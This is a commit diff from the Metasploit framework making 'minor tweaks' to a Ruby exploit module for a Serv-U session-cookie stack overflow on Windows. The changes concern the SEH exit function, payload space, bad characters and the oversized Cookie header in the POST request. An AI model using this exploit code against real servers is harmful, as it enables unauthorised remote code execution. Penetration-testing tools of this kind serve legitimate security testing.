minor tweaks

git-svn-id: file:///home/svn/framework3/trunk@7429 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-09 19:31:11 +00:00 · 2009-11-09 19:31:11 +00:00 · 434ee654b4
parent 493f56be57
commit 434ee654b4
1 changed files with 7 additions and 3 deletions
--- a/modules/exploits/windows/http/servu_session_cookie.rb
+++ b/modules/exploits/windows/http/servu_session_cookie.rb
@ -39,12 +39,12 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DefaultOptions' =>
 				{
-					'EXITFUNC' => 'thread',
+					'EXITFUNC' => 'seh',
 				},
 			'Privileged'     => true,
 			'Payload'        =>
 				{
-					'Space'    => 512,
+					'Space'    => 1024, # actually like 40960
 					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a",
 					'StackAdjustment' => -4096,
 				},
@ -72,6 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		
 		# hit end of stack..
+		#sploit = Rex::Text.pattern_create(75000, Rex::Text::DefaultPatternSets)
 		sploit = Rex::Text.rand_text(1000) * 75
 		
 		# new SEH handler (point esp into buffer)
@ -89,7 +90,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		
 		req =  "POST / HTTP/1.1\r\n"
 		req << "Host: #{rhost}:#{rport}\r\n"
-		req << "Cookie: Session=_"
+		req << "Cookie: Session="
+		if rand(1)
+			req << "_"
+		end
 		req << sploit.unpack('H*')[0]
 		req << "\r\n"
 		req << "\r\n";